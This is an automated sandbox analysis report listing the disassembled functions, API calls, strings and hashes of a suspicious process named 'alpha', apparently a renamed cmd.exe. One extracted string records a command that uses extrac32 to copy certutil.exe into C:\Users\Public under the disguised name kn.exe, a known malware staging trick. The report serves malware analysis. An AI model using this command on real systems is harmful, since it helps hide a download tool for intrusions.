                                                                                          • Instruction ID: 1ad143ff27c257d756d8c2383b43d8f55dd8ace2105b7ad052a21c81948b83a9
                                                                                          • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                          • Instruction Fuzzy Hash: DE32B072A0A783A6EB20DF21E8402F9B3A5FB49784F514135EA4D87796DF3CE545E700
                                                                                          Function 00007FF6A0E76EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 1795611712-3662956551
                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction ID: 352548f889852567d24aceffab15a8bbe482478e072a27fee47c09ea6970b0f6
                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction Fuzzy Hash: 93E1AF72E0E643A6EB508F64A8406F9A7A1FF49788F944132E94ED7796DF3CE504E340
                                                                                          Function 00007FF6A0E9EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E9EF33
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EF98
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFA9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFBF
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6A0E9EFDC
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9EFED
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F003
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F022
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F083
                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F092
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F0A5
                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6A0E9F0DB
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F135
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F16C
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6A0E9E964), ref: 00007FF6A0E9F185
                                                                                            • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                            • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                          • API String ID: 1161012917-1690691951
                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                          • Instruction ID: 2a1c5fc227ea66add031b99d3eebc812b33526e39a1133bd1759d0b9bd1e7474
                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                          • Instruction Fuzzy Hash: 36919F31B0B643AAFB149B71E8101BDAAB1BF49B95F548135EE0E937D5DF3CA845A300
                                                                                          Function 00007FF6A0E732B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E732F3
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6A0E732A4), ref: 00007FF6A0E73309
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6A0E73384
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E911DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                          • String ID:
                                                                                          • API String ID: 611521582-0
                                                                                          • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                          • Instruction ID: f7a3da1daeea221a8a5161bbfb9ea1f7b3c57b2d1338a3941ba57b383af83f28
                                                                                          • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                          • Instruction Fuzzy Hash: C0A1B032F0A613AAFB648B75A8002BDAAA1FB4DB96F444135DE0ED7784DF3CA445D300
                                                                                          Function 00007FF6A0E71560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                          • String ID: \\?\
                                                                                          • API String ID: 628682198-4282027825
                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction ID: c421523efc415085dede0690023eb7b97bf1ef95be863617260879444463929b
                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction Fuzzy Hash: 88E18D32B0A783A6EB649F24D8502F963A1FB89749F445139EA0E877D5EF3CE549D300
                                                                                          Function 00007FF6A0E9AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 16309207-0
                                                                                          • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                          • Instruction ID: 054c5866cefde78c672456e48fad56b12aaef300307352f2b076c1482ce7a52a
                                                                                          • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                          • Instruction Fuzzy Hash: B6229F72B0AB83E6EB649F25D9542F9A3A0FF89784F404535DA0E8BB95DF3CE1459300
                                                                                          Function 00007FF6A0E7CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                          • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 3863671652-4137775220
                                                                                          • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                                                          • Instruction ID: 0ffa25dec4ac35a407d619121735f3715ed87d0b518fb84cf06155fa83726f4c
                                                                                          • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                                                          • Instruction Fuzzy Hash: 30E19D32E0F683A6FA649B25A4543B966A1FF8A750F544139DA1EC23D2DF3CE845A700
                                                                                          Function 00007FF6A0E73410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                          • String ID: $Application$System
                                                                                          • API String ID: 3538039442-1881496484
                                                                                          • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                          • Instruction ID: d05680a938ec8bc0928644be57500d30614177dbcc3815d0f0bac51fc127bedb
                                                                                          • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                          • Instruction Fuzzy Hash: 0951CE72A0AB42A7EB248B25F40027AFAA1FB8DB85F558135EE4E83754DF3CD445E700
                                                                                          Function 00007FF6A0E9D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E9048E), ref: 00007FF6A0E9DA58
                                                                                          • memset.MSVCRT ref: 00007FF6A0E9DAD6
                                                                                          • memset.MSVCRT ref: 00007FF6A0E9DAFC
                                                                                          • memset.MSVCRT ref: 00007FF6A0E9DB22
                                                                                            • Part of subcall function 00007FF6A0E83A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
                                                                                            • Part of subcall function 00007FF6A0E75194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6A0E751C4
                                                                                            • Part of subcall function 00007FF6A0E8823C: FindFirstFileExW.KERNELBASE ref: 00007FF6A0E88280
                                                                                            • Part of subcall function 00007FF6A0E8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E8829D
                                                                                            • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                            • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                            • Part of subcall function 00007FF6A0E74FE8: _get_osfhandle.MSVCRT ref: 00007FF6A0E75012
                                                                                            • Part of subcall function 00007FF6A0E74FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75030
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9DDB0
                                                                                            • Part of subcall function 00007FF6A0E759E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
                                                                                            • Part of subcall function 00007FF6A0E759E4: _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E9DDEB
                                                                                          • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E9DDFA
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E204
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E223
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E9E242
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                          • String ID: %9d$%s$~
                                                                                          • API String ID: 3651208239-912394897
                                                                                          • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                          • Instruction ID: 904443e6706334def04eb8fe8b5f3bd6e46debbe737a2b3bb9a0c825e7956728
                                                                                          • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                          • Instruction Fuzzy Hash: 4A428E32A0E683A6EB649F21D8512FDB7A0FB85784F500136EA4DC7B9ADF3CE5459700
                                                                                          Function 00007FF6A0E7372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                          • String ID: COPYCMD$\
                                                                                          • API String ID: 3989487059-1802776761
                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction ID: 9f2aa5cf0865cdfd7e234e21ca3244d37e17bc5270b28c6447b3094c70056cde
                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction Fuzzy Hash: 9FF1D576B0A787A1EA649B25D4402BAA3A0FF49BC8F148135DE4E87795EF3CE445E300
                                                                                          Function 00007FF6A0E83140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                          • API String ID: 55602301-2548490036
                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                          • Instruction ID: 4fface3044e28e1a012421e08aaaa3b72b1c64a5e24605b3628407a8f93d4631
                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                          • Instruction Fuzzy Hash: ABA1C472A1A743E6EB208F10E4502BA77B5FB98754F504136EA5E83794EF7CE548E700
                                                                                          Function 00007FF6A0EA1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 3935429995-0
                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                          • Instruction ID: e239a4b13c2432d97a80d6835260837ee77f12c1ccb578403ad5e12e1ba6e3a1
                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                          • Instruction Fuzzy Hash: 4E61C036A0966392E714DF21A404679BBB4FF8DF96F259175EE4A83790EF3CD4019700
                                                                                          Function 00007FF6A0E735B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
